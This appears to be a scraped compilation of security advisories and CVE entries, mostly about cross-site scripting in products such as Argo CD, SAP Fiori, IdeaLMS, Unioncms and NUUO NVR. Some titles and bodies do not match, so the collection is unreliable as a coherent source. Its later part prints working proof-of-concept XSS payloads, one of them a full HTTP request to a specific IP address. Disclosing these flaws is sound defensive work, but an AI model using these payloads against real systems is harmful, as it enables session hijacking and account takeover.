Webkul krayin crm before 1.2.2 is vulnerable to Cross Site Scripting (XSS).

**Cross-site Scripting in krayin/laravel-crm**

Moderate severity GitHub Reviewed Published Jun 22, 2022 • Updated Jun 22, 2022

GHSA-v829-j9rr-85v9: Cross-site Scripting in krayin/laravel-crm

### Impact

All unpatched versions of Argo CD starting with v1.0.0 are vulnerable to a cross-site scripting (XSS) bug allowing a malicious user to inject a `javascript:` link in the UI. When clicked by a victim user, the script will execute with the victim's permissions (up to and including admin).

The script would be capable of doing anything which is possible in the UI or via the API, such as creating, modifying, and deleting Kubernetes resources.

### Patches

A patch for this vulnerability has been released in the following Argo CD versions:

* v2.4.1
* v2.3.5
* v2.2.10
* v2.1.16

### Workarounds

There are no completely-safe workarounds besides upgrading.

**Mitigations:**

1. Avoid clicking external links presented in the UI. Here is an example of an Application node with an external link:

   ![Application node in the Argo CD UI with an external link](https://user-images.githubusercontent.com/350466/171678146-026bbf20-2116-4b9f-8af8-7bb5b7ee8dff.png)

   The link's title is user-configurable. So even if you hover the link, and the tooltip looks safe, the link might be malicious. The only way to be certain that the link is safe is to inspect the page's source.

2. Carefully limit who has permissions to edit resource manifests (this is configured in [RBAC](https://argo-cd.readthedocs.io/en/stable/operator-manual/rbac/)).

### References

* [Documentation for the external links feature](https://argo-cd.readthedocs.io/en/stable/user-guide/external-url/)

### Credits

Disclosed by ADA Logics in a security audit of the Argo project sponsored by CNCF and facilitated by OSTIF. Thanks to Adam Korczynski and David Korczynski for their work on the audit.

### For more information

* Open an issue in [the Argo CD issue tracker](https://github.com/argoproj/argo-cd/issues) or [discussions](https://github.com/argoproj/argo-cd/discussions)
* Join us on [Slack](https://argoproj.github.io/community/join-slack) in channel #argo-cd


**Impact**

All unpatched versions of Argo CD starting with v1.0.0 are vulnerable to a cross-site scripting (XSS) bug allowing a malicious user to inject a javascript: link in the UI. When clicked by a victim user, the script will execute with the victim's permissions (up to and including admin).

The script would be capable of doing anything which is possible in the UI or via the API, such as creating, modifying, and deleting Kubernetes resources.

**Patches**

A patch for this vulnerability has been released in the following Argo CD versions:

*   v2.4.1
*   v2.3.5
*   v2.2.10
*   v2.1.16

**Workarounds**

There are no completely-safe workarounds besides upgrading.

**Mitigations:**

1.  Avoid clicking external links presented in the UI. Here is an example of an Application node with an external link:
    
    The link's title is user-configurable. So even if you hover the link, and the tooltip looks safe, the link might be malicious. The only way to be certain that the link is safe is to inspect the page's source.
    
2.  Carefully limit who has permissions to edit resource manifests (this is configured in RBAC).
    

**References**

*   Documentation for the external links feature

**Credits**

Disclosed by ADA Logics in a security audit of the Argo project sponsored by CNCF and facilitated by OSTIF. Thanks to Adam Korczynski and David Korczynski for their work on the audit.

**For more information**

*   Open an issue in the Argo CD issue tracker or discussions
*   Join us on Slack in channel #argo-cd

**References**

*   GHSA-h4w9-6x78-8vrj

GHSA-h4w9-6x78-8vrj: Argo CD's external URLs for Deployments can include JavaScript

The SAP Fiori launchpad suffers from a cross site scripting vulnerability. Various component versions are affected.

    # Onapsis Security Advisory 2022-0005: Cross-Site Scripting (XSS)vulnerability in SAP Fiori launchpad## Impact on BusinessImpact depends on the victim's privileges. In most cases, a successfulattackallows an attacker to hijack a session, or force the victim to performundesiredrequests in the SAP System (CSRF) as well as redirected to arbitrary website(Open Redirect).## Advisory Information- Public Release Date: 06/21/2022- Security Advisory ID: ONAPSIS-2022-0005- Researcher(s): Yvan Genuer## Vulnerability Information- Vendor: SAP- Affected Components:  - SAP\_UI 753  - SAP\_UI 754  - SAP\_UI 755  - SAP\_UI 756  - SAP\_BASIS 787  (Check SAP Note 3149805 for detailed information on affected releases)- Vulnerability Class: CWE-79- CVSS v3 score: 8.2 AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:N- Risk Level: High- Assigned CVE: CVE-2022-26101- Vendor patch Information: SAP Security NOTE 3149805## Affected Components DescriptionSAP Fiori launchpad is the entry point to ABAP platform for SAP Fiori appsonmobile and desktop devices.## Vulnerability DetailsDuring the navigation in SAP Fiori Launchpad, it is possible to provide acustomtheme name using the url parameter ```sap-theme```. This parameter has anoption to provide the path to a .css file, which it is used directly in thepagegeneration. This optional input is not sufficiently sanitized, allowing anattacker tocontrol and craft any kind of html payload in the page requested.## SolutionSAP has released SAP Note 3149805 which provide patched versions of theaffected components.The patches can be downloaded fromhttps://launchpad.support.sap.com/#/notes/3149805.Onapsis strongly recommends SAP customers to download the relatedsecurity fixes and apply them to the affected components in order toreduce business risks.## Report Timeline - 01/28/2022: Onapsis sends details to SAP - 02/09/2022: SAP provides internal ID - 03/08/2022: SAP releases SAP Note fixing the issue. - 06/21/2022: Advisory published## References- Onapsis blogpost:https://onapsis.com/blog/sap-security-patch-day-march-2022-sap-focused-run-affected-several-vulnerabilities- CVE Mitre:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26101- Vendor Patch:https://launchpad.support.sap.com/#/notes/3149805- Vendor FAQ:https://launchpad.support.sap.com/#/notes/3157089## About Onapsis Research LabsOnapsis Research Labs provides the industry analysis of key securityissues that impact business-critical systems and applications.Delivering frequent and timely security and compliance advisories withassociated risk levels, Onapsis Research Labs combine in-depth knowledgeand experience to deliver technical and business-context with soundsecurity judgment to the broader information security community.Find all reported vulnerabilities athttps://github.com/Onapsis/vulnerability_advisories## About Onapsis, Inc.Onapsis protects the mission-critical applications that run the globaleconomy,from the core to the cloud. The Onapsis Platform uniquely deliversactionableinsight, secure change, automated governance and continuous monitoring forcriticalsystems—ERP, CRM, PLM, HCM, SCM and BI applications—from leading vendorssuch as SAP,Oracle, Salesforce and others, while keeping them protected and compliant.For more information, connect with us on Twitter or LinkedIn, or visit us athttps://www.onapsis.com.-- This email and any files transmitted with it are confidential and intended solely for the use of the individual or entity to whom they are addressed. If you have received this email in error please notify the system manager. This message contains confidential information and is intended only for the individual named. If you are not the named addressee you should not disseminate, distribute or copy this e-mail.Please notify the sender immediately by e-mail if you have received this e-mail by mistake and delete this e-mail from your system. If you are not the intended recipient you are notified that disclosing, copying, distributing or taking any action in reliance on the contents of this information is strictly prohibited.

SAP Fiori Launchpad Cross Site Scripting

SAP Focused Run versions 2.00 and 3.00 suffer from a cross site scripting vulnerability.

    # Onapsis Security Advisory 2022-0003: Cross-Site Scripting (XSS)vulnerability in SAP Focused Run (Real User Monitoring)## Impact on BusinessImpact depends on the victim's privileges. In most cases, a successfulattackallows an attacker to hijack a session, or force the victim to performundesired requestin SAP Focused Run.## Advisory Information- Public Release Date: 06/21/2022- Security Advisory ID: ONAPSIS-2022-0003- Researcher(s): Yvan Genuer## Vulnerability Information- Vendor: SAP- Affected Components:  - FRUN 2.00  - FRUN 3.00  (Check SAP Note 3147283 for detailed information on affected releases)- Vulnerability Class: CWE-79- CVSS v3 score: 5.4 AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N- Risk Level: Medium- Assigned CVE: CVE-2022-24399- Vendor patch Information: SAP Security NOTE 3147283## Affected Components DescriptionSAP Focused Run is a spin-off from SAP Solution Manager concentrating on thespecific needs of high volume system and application monitoring, alertingandanalytics needs.(https://support.sap.com/en/alm/sap-focused-run/expert-portal/)## Vulnerability DetailsThe SAP Focused Run REST service ```/sap/bc/rest/rumupload``` do notsufficiently sanitize an input in the multipart/form-data leading toCross-SiteScripting (XSS) vulnerability from the error page generated.## SolutionSAP has released SAP Note 3147283 which provide patched versions of theaffected components.The patches can be downloaded fromhttps://launchpad.support.sap.com/#/notes/3147283.Onapsis strongly recommends SAP customers to download the relatedsecurity fixes and apply them to the affected components in order toreduce business risks.## Report Timeline - 01/28/2022: Onapsis sends details to SAP - 02/02/2022: SAP provides internal ID - 03/08/2022: SAP releases SAP Note fixing the issue. - 06/21/2022: Advisory published.## References- Onapsis blogpost:https://onapsis.com/blog/sap-security-patch-day-march-2022-sap-focused-run-affected-several-vulnerabilities- CVE Mitre:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24399- Vendor Patch:https://launchpad.support.sap.com/#/notes/3147283## About Onapsis Research LabsOnapsis Research Labs provides the industry analysis of key securityissues that impact business-critical systems and applications.Delivering frequent and timely security and compliance advisories withassociated risk levels, Onapsis Research Labs combine in-depth knowledgeand experience to deliver technical and business-context with soundsecurity judgment to the broader information security community.Find all reported vulnerabilities athttps://github.com/Onapsis/vulnerability_advisories## About Onapsis, Inc.Onapsis protects the mission-critical applications that run the globaleconomy,from the core to the cloud. The Onapsis Platform uniquely deliversactionableinsight, secure change, automated governance and continuous monitoring forcriticalsystems—ERP, CRM, PLM, HCM, SCM and BI applications—from leading vendorssuch as SAP,Oracle, Salesforce and others, while keeping them protected and compliant.For more information, connect with us on Twitter or LinkedIn, or visit us athttps://www.onapsis.com.-- This email and any files transmitted with it are confidential and intended solely for the use of the individual or entity to whom they are addressed. If you have received this email in error please notify the system manager. This message contains confidential information and is intended only for the individual named. If you are not the named addressee you should not disseminate, distribute or copy this e-mail.Please notify the sender immediately by e-mail if you have received this e-mail by mistake and delete this e-mail from your system. If you are not the intended recipient you are notified that disclosing, copying, distributing or taking any action in reliance on the contents of this information is strictly prohibited.

SAP FRUN 2.00 / 3.00 Cross Site Scripting

The GeoAnalytics feature in Qlik Sense April 2020 patch 4 allows SSRF.

**CVE-2021-41594**

RSA Archer

RSA Archer 6.9.SP1 P3 suffer of a privilege escalation vulnerability letting administrators access presumibily inaccessible functionalities.

**CVE-2021-40511**

Mastro – OBDA systems

OBDA systems’ Mastro 1.0 is vulnerable to XML Entity Expansion (aka “billion laughs”) attack allowing denial of service.

**CVE-2021-40510**

Mastro – OBDA systems

XML eXternal Entity (XXE) in OBDA systems’ Mastro 1.0 allows remote attackers to read system files via custom DTDs.

**CVE-TBA-01**

Liferay Portal

Cross-site scripting (XSS) vulnerability in the Gogo Shell module in Liferay Portal 7.1.0 through 7.3.6 and 7.4.0 allows remote attackers to inject arbitrary web script or HTML via the output of a Gogo Shell command.

**CVE-2021-36761**

Qlik Sense

The GeoAnalytics feature in Qlik Sense April 2020 patch 4 allows remote attackers to perform internal port scanning via SSRF.

**CVE-2021-36760**

WSO2 Identity Server

DOM-based XSS attack in WSO2 Identity Server 5.7.0 allows remote attackers to inject arbitrary web script in password reset procedure. This vulnerability can be used to perform Open Redirection attacks too.

**CVE-2020-23488**

L.E.F Radio Web Streamer

Blind Command Injection in L.E.F. srl Radio Web Streamer 1.0 allows an  
authenticated attacker to execute arbitrary command on the target system via specially crafted HTTP POST request.

**CVE-2020-23487**

L.E.F Radio Web Streamer

Arbitrary File Upload in L.E.F. srl Radio Web Streamer 1.0 allows an  
authenticated attacker to upload arbitrary file on the target system, hence  
executing arbitrary command by uploading a PHP file.

**CVE-2020-23486**

L.E.F Radio Web Streamer

Unauthenticated Command Injection in L.E.F. srl Radio Web Streamer 1.0 allows  an attacker to execute arbitrary command on the target system.

**CVE-2020-14608**

Oracle Fusion Middleware MapViewer

This vulnerability allows unauthenticated attacker with network access via HTTP to create, delete, edit critical data and read accessible data.

**CVE-2020-14607**

Oracle Fusion Middleware MapViewer

This vulnerability allows unauthenticated attacker with network access via HTTP to update, insert, delete and partially read accessible data.

**CVE-2020-14997**

ASiM – Archimista

An Insecure Direct Object Reference (IDOR) in Archimista 3.1.0 allows authenticated attacker to read and export all the reports in the application.

**CVE-2020-14996**

ASiM – Archimista

An arbitrary file read in Archimista 3.1.0 allows remote attacker to read arbitrary files on the file system.

**CVE-2020-14995**

ASiM – Archimista

A SQL injection in Archimista 3.1.0 allows remote attacker to execute arbitrary query on the database via the “term” parameter.

**CVE-2020-14994**

ASiM – Archimista

A SQL injection in Archimista 3.1.0 allows remote attacker to execute arbitrary query on the database via the “order” parameter.

**CVE-2020-10785**

Targa Telematics

**CVE-2020-10784**

Targa Telematics

**CVE-2019-19866**

Atos Unify OpenScape UC Application

Atos Unify OpenScape UC Web Client V9 before version V9 R4.31.0 and V10 before version V10 R0.6.0 allows remote attackers to obtain sensitive information. By iterating the value of conferenceId to getMailFunction in the JSON API, one can enumerate all conferences scheduled on the platform, with their numbers and access PINs.

**CVE-2019-19865**

Atos Unify OpenScape UC Application

Atos Unify OpenScape UC Application V9 before version V9 R4.31.0 and V10 before version V10 R0.6.0 allows XSS. An attacker could exploit this by convincing an authenticated user to inject arbitrary JavaScript code in the Profile Name field. A browser would execute this stored XSS payload.

**CVE-2019-17227**

Atos Unify OpenScape UC Application

CVE-2021-36761: Advisory - Joshua CybeRiskVision

IdeaLMS 2022 allows reflected Cross Site Scripting (XSS) via the IdeaLMS/Class/Assessment/ PATH_INFO.

Vulnerability Type: Reflected Cross Site Scripting (XSS) Vulnerability

Vendor of Product: Ideaco.ir

Affected Product Code Base: IdeaLMS

Product Version: 2022

Description: IdeaLMS allows Reflected XSS via PATH\_INFO

Attack Vectors: In order to exploit the vulnerability, victim must open a maliciously crafter link.

Attack Type: Remote

Payload: adxdt"onload="alert(1)"d6vv3hjschm

Assigned CVE-ID: CVE-2022-31786

Discoverer: Mohammad Reza Ismaeli Taba, Raspina Net Pars Group (RNPG Ltd.)

Steps To Reproduce

1\. Browse the the following URL: http://<target.xyz>/IdeaLMS/Class/Assessment/\[PATH\_INFO\]

2.You can create your malicious payload like the following and run your arbitrary JavaScript code on the browser’s of the victim

Example: http://<target.xyz>/IdeaLMS/Class/Assessment/adxdt%22onload%3d%22alert(1)%22d6vv3hjschm/-1/-1/129

#PoC

GET /IdeaLMS/Class/Assessment/adxdt%22onload%3d%22alert(1)%22d6vv3hjschm/-1/-1/129 HTTP/1.1

Host: <address in which IdeaLMS is set up>

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: close

CVE-2022-31786: Reflected Cross Site Scripting (XSS) Vulnerability PoC - IdeaLMS.txt

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

*   *   *   *   ui.js
        *   mix-manifest.json
    *   *   table-body.vue

Prev Next

fixed xss issue at datagrid

*   Loading branch information

commit 882dc2e7e7e9149b96cf1ccacf34900960b92fb7

Large diffs are not rendered by default.

@@ -1,5 +1,5 @@

{

"/js/ui.js": "/js/ui.js?id=04e2fdebe8621c6953e2",

"/js/ui.js": "/js/ui.js?id=42bdc4ac52e1762101c3",

"/css/ui.css": "/css/ui.css?id=58acb02c87af96127d4b",

"/images/add-icon.svg": "/images/add-icon.svg?id=9135b4e0e1c239c36981",

"/images/align-justify-icon.svg": "/images/align-justify-icon.svg?id=ee8d48e636b80417a884",

@@ -36,7 +36,7 @@

:key\="rowIndex"

v-if\="column.type != 'hidden'"

@click\="redirectRow(row.redirect\_url)"

v-html\="getRowContent(row\[column.index\])"

v-text\="getRowContent(row\[column.index\])"

:title\="column.title ? row\[column.index\] : ''"

:class\="\[row.redirect\_url ? 'cursor-pointer' : '', column.class || column.index \]"

\></td\>

@@ -174,7 +174,7 @@

type : "success",

message : response.data.message,

});

EventBus.$emit('refresh\_table\_data', {usePrevious: true});

}

}

@@ -189,4 +189,4 @@

}

}

};

</script\>

</script\>

CVE-2021-41924: fixed broken access control issue for account update by naresh-webkul · Pull Request #195 · krayin/laravel-crm

There is a Cross Site Scripting Stored (XSS) vulnerability in NukeViet CMS before 4.5.02.

**Introduction about NukeViet**

NukeViet is the first opensource CMS in Vietnam. The lastest version - NukeViet 4 coding ground up support lastest web technologies, include reponsive web design (use HTML 5, CSS 3, Composer, XTemplate), jQuery, Ajax...) enables you to build websites and online applications rapidly.

With it own core libraries built in, NukeViet 4 is cross platforms and frameworks independent. By basic knowledge of PHP and MySQL, you can easily extend NukeViet for your purposes.

NukeViet core is simply but powerful. It supports abstract modules which can be duplicate. So, it helps you create automatically many modules without any line of code from existing abstract modules.

NukeViet supports installing automatically modules, blocks, themes at Admin Control Panel and supports packing features which allow you to share your modules to web- community.

NukeViet fully supports multi-languages for internationalization and localization. Not only multi-interface languages but also multi-database languages are supported. NukeViet supports you to build new languages which are not distributed by NukeViet.

Detailed information about Nukeviet at Wikipedia Encyclopedia: http://vi.wikipedia.org/wiki/NukeViet

**Licensing**

NukeViet is released under GNU/GPL version 2 or any later version.

See LICENSE for the full license.

**NukeViet official website**

*   Home page - link to all resources NukeViet: http://nukeviet.vn (select Vietnamese to have the latest information).
*   NukeViet official Coding: http://code.nukeviet.vn
*   Theme, Module and more add-ons for NukeViet: http://nukeviet.vn/vi/store/
*   NukeViet official Forum http://forum.nukeviet.vn/
*   Open Document Library for NukeViet: http://wiki.nukeviet.vn/
*   NukeViet Translate Center: http://translate.nukeviet.vn/
*   NukeViet partner: http://nukeviet.vn/vi/partner/
*   NukeViet Education Center: http://nukeviet.edu.vn
*   NukeViet SaaS: http://nukeviet.com (testing)

**Community**

*   NukeViet Fanpage: http://facebook.com/nukeviet
*   NukeViet group on FB: https://www.facebook.com/groups/nukeviet/
*   http://twitter.com/nukeviet
*   https://groups.google.com/forum/?fromgroups#!forum/nukeviet
*   https://www.youtube.com/c/nukeviet

**NukeViet Centre for Research and Development**

VIETNAM OPEN SOURCE DEVELOPMENT JOINT STOCK COMPANY (VINADES.,JSC)

Website: http://vinades.vn | http://nukeviet.vn | http://nukeviet.com

Head Office:

*   Room 1706 - CT2 Nang Huong Building, 583 Nguyen Trai st, Ha Dong dist, Hanoi, Vietnam.
*   Phone: +84-24-85872007, Fax: +84-24-35500914, Email: contact (at) vinades.vn

CVE-2022-30874: GitHub - nukeviet/nukeviet: NukeViet CMS is multi Content Management System. NukeViet CMS is the 1st open source content management system in Vietnam. NukeViet was awarded the Vietnam Talent 2011, the

Unioncms v1.0.13 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Default settings.

1.The problem is in system settings - basic settings - default settings - third party code  
write：<script>alert(1)</script> Save, open the home page and the XSS code will pop up  
The problem is as follows：  

2.Management background-content management-all management modules-add a piece of content-insert video in the content, write：img src="x" onerror="alert(1);"  
  
Save, open the corresponding foreground article and background article will pop up XSS code  
The problem is as follows：

CVE-2022-25585: Stored XSS exists · Issue #5 · union-home/unioncms

NUUO Network Video Recorder NVRsolo v03.06.02 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via login.php.

    "><script>alert("XSS")</script><"
    

    POST /login.php HTTP/1.1
    Host: 218.253.76.122:8000
    Content-Length: 45
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://218.253.76.122:8000
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: "><script>alert("XSS")</script><"
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: lang=en; PHPSESSID=b630e0a3b454ae69c6aacbe257435b55
    Connection: close
    
    language=11111&user=111&pass=222&submit=Login

Tag

#xss